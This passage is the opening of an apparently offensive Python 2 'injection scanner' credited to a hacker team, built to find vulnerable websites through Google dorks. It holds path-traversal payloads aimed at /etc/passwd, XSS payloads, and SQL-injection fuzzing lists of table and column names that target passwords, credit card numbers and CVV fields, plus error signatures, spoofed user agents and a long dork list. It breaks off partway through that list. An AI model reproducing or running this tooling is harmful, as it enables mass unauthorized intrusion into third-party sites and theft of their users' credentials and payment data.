#!/usr/bin/python
# -*- coding: utf-8 -*-
import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W  = "\033[0m";
R  = "\033[31m";
G  = "\033[32m";
O  = "\033[33m";
B  = "\033[34m";


# Banner
def logo():
        print '''

________^^^________^^.____^^^^^^^__^^^^^^_____^^^
\______^\^^\_____^^\^|^^^^|^^^^_/^^|_^^^/^^|^^|^^
^|^^^^|^^\^^^_(__^^<^|^^^^|^^^^\^^^__\^/^^^|^^|_^
^|^^^^`^^^\^/^^^^^^^\|^^^^|___^^|^^|^^/^^^^^^^^/^
/_______^^//______^^/|_______^\^|__|^^\____^^^|^^
^^^^^^^^\/^^^^^^^^\/^^^^^^^^^\/^^^^^^^^^^^^|__|^^

 A mutation of smartd0rk3r and can search for 10,446 Google dorks.
 It then performs several checks for vulnerabilities in the sites.

 Sorts :

   - added dork array
   - added input for number of random dorks
   - added bugfix for over tor (it crashed alot over tor)
   - added optimization, 1 page with 0 results, skip to next dork
   - added extra check for links to comply with target (makes it alot
more target-specific)
   - put main instructions together, added 12 - new scan option
   - added Column Finder
   - added column and table fuzzer
   - added superlarge Dork list
   - added new headers
   - added lots of new XSS detectors


|---------------------------------------------------------------|
| Author : Hruday Charan AKA Th3 Lazarus                        |
| Description : INJECTION SCANNER ( MULTI )                     |
| Team : Hell Shield Hackers And Team Cyber Poison              |
| Greetz : Psychotic Ov3rLorD , P0150n Op3r470r , Root_X_FlooD  |
                                                         |
|          in73ct0r d3vil , Mr.404 .                            |
| Thanks : Darkc0de (SQL) , IHC , IMH ,and All INDIAN HACKERS   |
|---------------------------------------------------------------|

		'''

if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()

else:
  subprocess.call("cls", shell=True)
  logo()

log = "delta-sqli.txt"
logfile = open(log, "a")
lfi_log = "delta-lfi.txt"
lfi_log_file = open(lfi_log, "a")
rce_log = "delta-rce.txt"
rce_log_file = open(rce_log, "a")
xss_log = "delta-xss.txt"
xss_log_file = open(xss_log, "a")

arg_end = "--"
arg_eva = "+"
colMax = 10 # Change this at your will
gets = 0
file = "/etc/passwd"
threads = []
darkurl = []
vuln = []
col = []
timeout = 60
socket.setdefaulttimeout(timeout)




lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E","PGgxPlhTUyBieSBOb3ZhQ3lnbmk8L2gxPg==","%3C%68%31%3E%58%53%53%20%62%79%20%4E%6F%76%61%43%79%67%6E%69%3C%2F%68%31%3E","&#x3C;&#x68;&#x31;&#x3E;&#x58;&#x53;&#x53;&#x20;&#x62;&#x79;&#x20;&#x4E;&#x6F;&#x76;&#x61;&#x43;&#x79;&#x67;&#x6E;&#x69;&#x3C;&#x2F;&#x68;&#x31;&#x3E;","<IMG SRC=JaVaScRiPt:alert('XSS by NovaCygni')>","<IMG SRC=`javascript:alert('XSS By NovaCygni')`>"]

tables = ['user','users','tbladmins','Logins','logins','login','admins','members','member',
'_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts',
'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo',
'administer', 'administrable', 'administrate', 'administration',
'administrator', 'administrators', 'adminrights', 'admins',
'adminuser','adminusers','article_admin', 'articles',
'artikel','author', 'autore', 'backend', 'backend_users',
'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages',
'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config',
'contact', 'contacts', 'content', 'control', 'cpg_config',
'cpg132_users', 'customer', 'customers', 'customers_basket',
'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users',
'e107.e107_user', 'e107_user', 'forum.ibf_members',
'fusion_user_groups', 'fusion_users', 'group', 'groups',
'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members',
'ibf_members_converge', 'ibf_sessions', 'icq', 'index', 'info',
'ipb.ibf_members', 'ipb_sessions', 'joomla_users',
'jos_blastchatc_users', 'jos_comprofiler_members',
'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg',
'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici',
'kpro_adminlogs', 'kpro_user', 'links', 'login_admin', 'login_admins',
'login_user', 'login_users','logon', 'logs', 'lost_pass',
'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main',
'mambo_session', 'mambo_users', 'manage', 'manager',
'mb_users','memberlist','minibbtable_users', 'mitglieder',
'mybb_users', 'mysql', 'name', 'names', 'news', 'news_lostpass',
'newsletter', 'nuke_users', 'obb_profiles', 'order', 'orders',
'parol', 'partner', 'partners', 'passes', 'password', 'passwords',
'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user',
'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users',
'phpBB2.forum_users', 'phpBB2.phpbb_users',
'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user',
'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered',
'reguser', 'regusers', 'session', 'sessions', 'settings',
'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin',
'sitelogins', 'sites', 'smallnuke_members', 'smf_members',
'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins',
'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin',
'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user',
'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user',
'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients',
'tblclient', 'test', 'usebb_members','user_admin', 'user_info',
'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol',
'userinfo', 'userlist', 'userlogins', 'username', 'usernames',
'userrights','vb_user', 'vbulletin_session', 'vbulletin_user',
'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters',
'webuser', 'webusers','wp_users', 'x_admin', 'xar_roles',
'xoops_bannerclient', 'xoops_users', 'yabb_settings',
'yabbse_settings', 'Category', 'CategoryGroup', 'ChicksPass',
'dtproperties', 'JamPass', 'News', 'Passwords by usage count',
'PerfPassword', 'PerfPasswordAllSelected','pristup', 'SubCategory',
'tblRestrictedPasswords', 'Ticket System Acc Numbers', 'Total Members', 'UserPreferences', 'tblConfigs', 'tblLogBookAuthor',
'tblLogBookUser', 'tblMails', 'tblOrders', 'tblUser', 'cms_user',
'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user',
'table_user', 'email', 'mail', 'bulletin', 'login_name',
'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login',
'UserAdmin']

columns = ['user', 'username', 'password', 'passwd', 'pass',
'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name',
'customers_email_address', 'customers_password', 'user_password',
'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass',
'usern', 'user_n', 'users', 'login', 'logins', 'login_user',
'login_admin', 'login_username', 'user_username', 'user_login',
'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid',
'admin_userid', 'adminusername', 'admin_username', 'adminname',
'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass',
'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername',
'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users',
'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini',
'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik',
'korisnici', 'user1', 'administrator', 'administrator_name',
'mem_login', 'login_password', 'login_pass', 'login_passwd',
'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word',
'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword',
'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword',
'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin',
'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass',
'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname',
'my_username', 'my_name', 'my_password', 'my_email', 'korisnicko',
'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account',
'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail',
'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication',
'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid',
'clientname', 'clientpassword', 'clientusername', 'conf', 'config',
'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack',
'customer', 'customers', 'cvvnumber', 'data', 'db_database_name',
'db_hostname', 'db_password', 'db_username', 'download', 'e-mail',
'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash',
'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member',
'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname',
'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo',
'md5hash', 'member', 'member_id', 'member_login_key', 'member_name',
'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number',
'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key',
'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer',
'secretquestion', 'serial', 'session_member_id',
'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer',
'status', 'store', 'store1', 'store2', 'store3', 'store4',
'table_prefix', 'temp_pass', 'temp_password', 'temppass',
'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip',
'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd',
'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm',
'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs',
'warez', 'xar_name', 'xar_pass']


sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' :
'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format'}


header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
    'amaya/9.51 libwww/5.4.0',
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']



d0rk = [ '.asp?CategoryID', '.asp?ProdID', '.asp?Sku', '.asp?StyleID',
'.asp?cart', '.asp?cartID', '.asp?catID', '.asp?catalogid',
'.asp?categorylist', '.asp?cid', '.asp?code', '.asp?codeno',
'.asp?designer', '.asp?framecode', '.asp?id', '.asp?idcategory',
'.asp?idproduct', '.asp?intCatalogID', '.asp?intProdId', '.asp?item',
'.asp?itemID', '.asp?maingroup', '.asp?misc', '.asp?newsid',
'.asp?orderid', '.asp?p', '.asp?pid', '.asp?product',
'.asp?productid', '.asp?showtopic', '.asp?storeid', '.asp?userID',
'.br/index.php?loc', '.gov.br/index.php?arquivo', '.htpasswd',
'.php?PageID', '.php?REQUEST&REQUEST[option]comcontent&REQUEST[Itemid]1&GLOBALS&mosConfigabsolutepath',
'.php?S', '.php?a', '.php?abrir', '.php?act', '.php?action',
'.php?ad', '.php?archive', '.php?area', '.php?article', '.php?b',
'.php?back', '.php?base', '.php?basedir', '.php?bbs', '.php?boardno',
'.php?body', '.php?c', '.php?caldir', '.php?cat', '.php?catch',
'.php?category', '.php?choice', '.php?cid', '.php?class',
'.php?clubid', '.php?cod', '.php?cod.tipo', '.php?conf',
'.php?configFile', '.php?cont', '.php?corpo', '.php?cvsroot',
'.php?d', '.php?da', '.php?date', '.php?debug', '.php?debut',
'.php?default', '.php?destino', '.php?dir', '.php?display',
'.php?east', '.php?f', '.php?fcontent', '.php?file', '.php?fileid',
'.php?filepath', '.php?flash', '.php?folder', '.php?for', '.php?form',
'.php?formatword', '.php?from', '.php?funcao', '.php?function',
'.php?g', '.php?get', '.php?go', '.php?gorumDir', '.php?goto',
'.php?h', '.php?headline', '.php?i', '.php?id', '.php?inc',
'.php?include', '.php?includedir', '.php?inf', '.php?inter',
'.php?itemid', '.php?j', '.php?join', '.php?jojo', '.php?l',
'.php?la', '.php?lan', '.php?lang', '.php?layout', '.php?lest',
'.php?link', '.php?load', '.php?loc', '.php?locate', '.php?m',
'.php?main', '.php?meio', '.php?meio.php', '.php?menu', '.php?menuID',
'.php?mep', '.php?mid', '.php?mode', '.php?month', '.php?mostra',
'.php?my', '.php?n', '.php?naam', '.php?name', '.php?nav', '.php?new',
'.php?news', '.php?next', '.php?nextpage', '.php?o', '.php?op',
'.php?open', '.php?option', '.php?origem', '.php?p', '.php?pageurl',
'.php?para', '.php?part', '.php?perm', '.php?pg', '.php?pid',
'.php?place', '.php?play', '.php?plugin', '.php?pmpath',
'.php?pollname', '.php?post', '.php?pr', '.php?prefix',
'.php?prefixo', '.php?q', '.php?redirect', '.php?ref', '.php?refid',
'.php?regionId', '.php?release', '.php?releaseid', '.php?return',
'.php?root', '.php?searchcodeid', '.php?sec', '.php?secao',
'.php?secc', '.php?sect', '.php?sel', '.php?server', '.php?servico',
'.php?session&content', '.php?sg', '.php?shard', '.php?show',
'.php?sid', '.php?site', '.php?sourcedir', '.php?start',
'.php?storyid', '.php?str', '.php?subd', '.php?subdir',
'.php?subject', '.php?sufixo', '.php?systempath', '.php?t',
'.php?task', '.php?teste', '.php?themedir', '.php?threadid',
'.php?tid', '.php?title', '.php?to', '.php?topicid', '.php?type',
'.php?u', '.php?url', '.php?urlFrom', '.php?v', '.php?var', '.php?vi',
'.php?view', '.php?visual', '.php?wPage', '.php?y', '.php?z',
'.php?zo', '/.gov.br/index.php?arquivo', '/.php?include',
'/.php?page', '/.php?secc',
'//langenglish/langmainalbum.php?phpbbrootpath',
'/?mosConfigabsolutepath', '/?p', '/?pag', '/?page', '/?pagephp5?id',
'/?pagphp5?id', '/?pg', '/?pgphp5?id', '/?pphp5?id',
'/Citrix/Nfuse17/', '/Decoder.php?basedir', '/Encoder.php?basedir',
'/Gallery/displayCategory.php?basepath',
'/Gery/displayCategory.php?basepath', '/GradeMap/index.php?page',
'/Index.php?id',
'/Merchant2/admin.mv|/Merchant2/admin.mvc|MivaMerchantAdministrationLogincheapmalboro.net',
'/MyeGallery/public/displayCategory.php?basepath',
'/NSearch/AdminServlet',
'/NuclearBB/tasks/sendqueuedemails.php?rootpath',
'/PHPDJv05/dj/djpage.php?page',
'/PhpLinkExchange/bitslistings.php?svrrootPhpStart',
'/Popper/index.php?childwindow.inc.php?form',
'/SQuery/lib/gore.php?libpath',
'/SUSAdminMicrosoftSoftwareupd?t?Services', '/WebSTAR',
'/[MyAlbumDIR]/.inc.php?langsdir', '/[Script',
'/access/login.php?pathtoroot', '/account.php?action',
'/accounts.php?command',
'/active/components/xmlrpc/client.php?c[components]',
'/addmedia.php?factsfile[$]',
'/addpostnewpoll.php?addpollpreview&thispath',
'/addpostnewpoll.php?addpollpreview&thispath/ubbthreads/',
'/addpostnewpoll.php?addpollpreview&thispathubbthreads',
'/admcfgedit.php', '/admin.php?caldir', '/admin.php?page',
'/admin/auth.php?xcartdir', '/admin/configuration.php?Mystore',
'/admin/doeditconfig.php?thispath./includes&config[path]',
'/admin/inc/changeaction.php?formatmenue',
'/admin/include/header.php?repertoire', '/admin/index.php?o',
'/admin/index.php?oadmin/index.php',
'/admin/index.php?oadmin/index.php;', '/admin/login.asp',
'/admincp/auth/checklogin.php?cfgProgDir',
'/administrator/components/coma6mambocredits/admin.a6mambocredits.php?mosConfiglivesite',
'/administrator/components/comcomprofiler/plugin.class.php?mosConfigabsolutepath',
'/administrator/components/comcropimage/admin.cropcanvas.php?cropimagedir',
'/administrator/components/comjcs/jcs.function.php?mosConfigabsolutepath',
]
d0rk += [ 'addToCart.cfm?idProduct', 'addToCart.php?idProduct',
'addcart.asp?', 'addcart.asp?num', 'addcart.cfm?', 'addcart.cfm?num',
'addcart.php?', 'addcart.php?num', 'addcolumn.php?id',
'addedit.php?rootdir', 'addevent.inc.php?agendaxpath',
'addimage.php?cid', 'addmedia.php?factsfile[$LANGUAGE]phpGedView',
'addpages.php?id', 'addsiteform.php?catid', 'addtocart.asp?ID',
'addtocart.cfm?ID', 'addtocart.php?ID', 'addtomylist.asp?ProdId',
'addtomylist.cfm?ProdId', 'addtomylist.php?ProdId', 'adetail.php?id',
'admin', 'admin.php?caldir', 'admin.php?page',
'admin/doeditconfig.php?thispath./includes&config[path]',
'admin/doeditconfig.php?thispath./includes&config[path]admin',
'admin/index.php?o', 'adminEditProductFields.asp?intProdID',
'adminEditProductFields.cfm?intProdID',
'adminEditProductFields.php?intProdID', 'adminaccountinfofiletypelog',
'adminfiletypeaspGenericuserlistfiles', 'adminfiletypedb',
'adminfiletypexls',
'administrator/components/coma6mambocredits/admin.a6mambocredits.php?mosConfiglivesite',
'administrator/components/comcomprofiler/plugin.class.php?mosConfigabsolutepath',
'administrator/components/comcomprofiler/plugin.class.php?mosConfigabsolutepath/tools/sendreminders.php?includedirallday.php?date',
'administrator/components/comcomprofiler/plugin.class.php?mosConfigabsolutepath/tools/sendreminders.php?includedirday.php?date',
'administrator/components/comcropimage/admin.cropcanvas.php?cropimagedir',
'administrator/components/comcropimage/admin.cropcanvas.php?cropimagedirmodules/MyeGallery/index.php?basepath',
'administrator/components/comcropimage/admin.cropcanvas.php?cropimagedirmodules/MyeGery/index.php?basepath',
'administrator/components/comlinkdirectory/toolbar.linkdirectory.html.php?mosConfigabsolutepath',
'administrator/components/commgm/help.mgm.php?mosConfigabsolutepath',
'administrator/components/commgm/help.mgm.php?mosConfigabsolutepathhelp.php?csspath',
'administrator/components/compeoplebook/param.peoplebook.php?mosConfigabsolutepath',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepath',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepath/comremository/',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepath/tags.php?BBCodeFile',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepathMambo',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepathcomremository',
'administrator/components/comremository/admin.remository.php?mosConfigabsolutepathindex.php?optioncomremository',
'administrator/components/comwebring/admin.webring.docs.php?componentdir',
'administrators.pwd', 'administratorwelcometomambo', 'adminlogin',
'adminpanel', 'adminuserlistGenericuserlistfiles', 'adobtsitel',
'adpassword.txt', 'ads/index.php?cat', 'advSearchh.asp?idCategory',
'advSearchh.cfm?idCategory', 'advSearchh.php?idCategory',
'affich.php?base', 'affiliate.asp?ID', 'affiliate.cfm?ID',
'affiliate.php?ID', 'affiliateagreement.cfm?storeid',
'affiliates.asp?id', 'affiliates.cfm?id', 'affiliates.php?id',
'afile', 'agendax/addevent.inc.php?agendaxpath', 'ages.php?id',
'aggregator.php?id', 'aglimpse', 'airactivity.cfm?id',
'akocomments.php?mosConfigabsolutepath',
'aktuelles/meldungendetail.asp?id',
'aktuelles/meldungendetail.php?id',
'aktuelles/veranstaltungen/detail.asp?id',
'aktuelles/veranstaltungen/detail.php?id',
'albumportal.php?phpbbrootpath', 'alinitialize.php?alpath',
'all..TestpageforApacheInstallation..', 'all.br/index.php?loc',
'all.php?bodyfile', 'all.r{}vticnf/', 'all//vtipvt/|all//vticnf/',
'all/Popper/index.php?', 'all/default.php?pagehome',
'all/examples/jsp/snp/snoop.jsp', 'all/folder.php?id', 'all/forum/',
'all/includes/orderSuccess.inc.php?glob', 'all/index.php?filesite.dk',
'all/index.php?pagesite.dk', 'all/modules.php?nameallmyguests',
'all/osticket/', 'all4nAlbumsite.org',
'allNetworkCameraNetworkCamera', 'allWelcometotheCyclades',
'all\TestpageforApacheInstallation', 'alladmin.php', 'alladminmdb',
'allapplication.php?basepath', 'allauthuserfile.txt', 'allcdkey.txt',
'allcontrol/multiview', 'allcopperminesite.org',
'allexchange/logon.asp', 'allforums.html', 'allihm.php?p',
'allindex.phpsitesglinks', 'allindexof/admin', 'allindexof/root',
'allinstall/install.php', 'allintranetadmin', 'allmain.php?pagina',
'allmanage.pl', 'allmyegallerysite.org',
'allowcalltimepassreferencePATHINFO',
'allpoweredbyAshNewsallAshNewsatauall/ashnews.php',
'allrestrictedfiletypedocsitegov', 'allrestrictedfiletypemail',
'allsensitivefiletypedoc', 'allservlet/SnoopServlet',
'allshoutbox/expanded.phpfiletypephp', 'allstatic.php?load',
'allwps/portal/login', 'allxgallerysite.org',
'altroesempioWinZip8.1\WinZip8.1\94FBR', 'amadmin.pl',
'ancillary.asp?ID', 'ancillary.cfm?ID', 'ancillary.php?ID',
'andserverinformation', 'animal/products.php?id', 'anj.php?id',
'announce.php?id', 'announcements.php?phpraiddirphpraid',
'announcements.php?phpraiddirphpraidsignup',
'answer/default.asp?pollID', 'answer/default.php?pollID' ]
d0rk += [ 'aol/do/rsspopup?blogID',
'aol/do/rsspopup?blogIDfooter.inc.phpinfo.inc.phpManyServers.htm',
'app/webeditor/login.cgi?username&commandsimple&doedit&password&file',
'apricotadmin00h', 'architectfull.php?id', 'archive.asp?id',
'archive.cfm?id', 'archive.php?id', 'archive/get.asp?messageid',
'archive/get.php?messageid', 'areoftentypedasargumentstrings',
'arg.php?argphp?arg', 'args.php?argphp?arg', 'arquivo.php?data',
'ars/cgibin/arweb?O0|arweb.jspsiteremedy.comsitemil',
'ars/cgibin/arweb?O0�|arweb.jspsiteremedy.comsitemil', 'art.asp?id',
'art.php?id', 'art.php?idm', 'artform.cfm?id', 'article.asp?id',
'article.cfm?id', 'article.php?ID', 'article.php?sid',
'article/article.php?id', 'article/index.php?id',
'articlecategory.asp?id', 'articlecategory.php?id',
'articlefull.php?id', 'articlepreview.asp?id',
'articlepreview.php?id', 'articles.asp?id', 'articles.cgi?a34&t',
'articles.php?id', 'articles/article.php?id',
'articles/details.php?id', 'articles/index.php?id',
'artikelinfo.php?id', 'artist.php?id', 'artistart.asp?id',
'artistart.php?id', 'artistdetail.php?ID', 'artistinfo.php?artistId',
'artists.php?id', 'artists/details.php?id', 'artists/index.php?id',
'artists/story/index.php?id', 'artpage.php?id',
'ashellcommandprompt;usernamesare', 'asp', 'asp/event.asp?id',
'asp/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s',
'asp/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s',
'asp/index.asp?id', 'aspx?PageID',
'asterisk.management.portalwebaccess', 'atom.php5?pagephp5?id',
'auction/item.asp?id', 'auction/item.php?id',
'auctiondetails.php?auctionid', 'auctionweaver.pl',
'auktion.pl?menue', 'authorDetails.asp?bookID',
'authorDetails.php?bookID', 'authors.pwd', 'authuserfile.txt',
'auto.php?incphp?inc', 'auto.php?pageauto.php?page',
'avatar.php?page', 'avdstart.php?avd', 'awards/index.php?input1',
'axiscgi/jpg', 'axiscgi/mjpgmotionJPEG', 'axisvideoserver',
'b2evo>LoginformLoginform.Youmustlogin!Youwillhavetoacceptcookiesinordertologindemositeb2evolution.net',
'backupfiletypemdb', 'bandinfo.php?id', 'base.php?', 'base.php?[]',
'base.php?abre', 'base.php?adresa', 'base.php?basedir',
'base.php?basepath', 'base.php?body', 'base.php?category',
'base.php?chapter', 'base.php?choix', 'base.php?cont',
'base.php?disp', 'base.php?doshow', 'base.php?ev', 'base.php?eval',
'base.php?f1base.php?f1', 'base.php?f1php?f1', 'base.php?filepath',
'base.php?home', 'base.php?id', 'base.php?incl', 'base.php?include',
'base.php?ir', 'base.php?itemnav', 'base.php?k', 'base.php?ki',
'base.php?l', 'base.php?lang', 'base.php?link', 'base.php?loc',
'base.php?mid', 'base.php?middle', 'base.php?middlePart',
'base.php?module', 'base.php?name', 'base.php?numero',
'base.php?oldal', 'base.php?opcion', 'base.php?pa', 'base.php?pag',
'base.php?pageweb', 'base.php?panel', 'base.php?path',
'base.php?phpbbrootpath', 'base.php?play', 'base.php?pname',
'base.php?rub', 'base.php?seccion', 'base.php?second',
'base.php?seite', 'base.php?sekce', 'base.php?sivu', 'base.php?str',
'base.php?subject', 'base.php?t', 'base.php?texto', 'base.php?to',
'base.php?v', 'base.php?var', 'base.php?w', 'basket.asp?id',
'basket.cfm?id', 'basket.php?id', 'bayer/dtnews.asp?id',
'bayer/dtnews.php?id', 'bbs/bbsView.asp?id', 'bbs/bbsView.php?id',
'bbs/view.asp?no', 'bbs/view.php?no', 'bbs/view.php?tbl',
'bbsforum.cgi', 'bbusagestats/include/bbusagestats.php?phpbbrootpath',
'bbusagestats/include/bbusagestats.php?phpbbrootpathforum',
'bearstore/store.php?catid',
'becommunity/community/index.php?pageurl', 'beitragD.asp?id',
'beitragD.php?id', 'beitragF.asp?id', 'beitragF.php?id',
'bid/topic.asp?TopicID', 'bid/topic.php?TopicID',
'big.php?pathtotemplate',
'bin.welcome.sh|bin.welcome.bat|eHealth.5.0', 'biznews.cgi?a33&t',
'blank.php?OpenPage', 'blank.php?abre', 'blank.php?action',
'blank.php?basedir', 'blank.php?basepath', 'blank.php?body',
'blank.php?category', 'blank.php?channel', 'blank.php?corpo',
'blank.php?destino', 'blank.php?dir', 'blank.php?filepath',
'blank.php?get', 'blank.php?goFile', 'blank.php?goto', 'blank.php?h',
'blank.php?header', 'blank.php?id', 'blank.php?in', 'blank.php?incl',
'blank.php?ir', 'blank.php?itemnav', 'blank.php?j', 'blank.php?ki',
'blank.php?lang', 'blank.php?left', 'blank.php?link',
'blank.php?loader', 'blank.php?menu', 'blank.php?mod',
'blank.php?name', 'blank.php?o', 'blank.php?oldal', 'blank.php?open',
'blank.php?pa', 'blank.php?page', 'blank.php?pagina',
'blank.php?panel', 'blank.php?path', 'blank.php?phpbbrootpath',
'blank.php?pname', 'blank.php?pollname', 'blank.php?pr',
'blank.php?pre', 'blank.php?pref', 'blank.php?qry', 'blank.php?read',
'blank.php?ref', 'blank.php?rub', 'blank.php?section',
'blank.php?sivu', 'blank.php?sp', 'blank.php?strona',
'blank.php?subject', 'blank.php?t', 'blank.php?url', 'blank.php?var',
'blank.php?where', 'blank.php?xlink', 'blank.php?z', 'blog.asp?blog',
'blog.php?blog', 'blog/?p', 'blog/index.asp?idBlog',
'blog/index.php?idBlog', 'blogdetail.asp?id', 'blogdetail.php?id',
'blpage.php?id', 'bnbform.cgi', 'board', 'board.php?seeboard.php?see',
'board.php?seephp?see', 'board/board.html?table',
'board/kboard.php?board' ]
d0rk += [ 'board/read.asp?tid', 'board/read.php?tid',
'board/showthread.asp?t', 'board/showthread.php?t',
'board/templete/sycho/input.php?table', 'board/view.asp?no',
'board/view.php?no', 'board/viewtemp.php?table',
'board/viewtopic.php?id', 'boardView.asp?bbs', 'boardView.php?bbs',
'boardview.asp?sboardid', 'boardview.html?id',
'boardview.php?sboardid', 'boatplans.asp?id', 'book.asp?ID',
'book.asp?ISBN', 'book.html?isbn', 'book.php5?pagephp5?page',
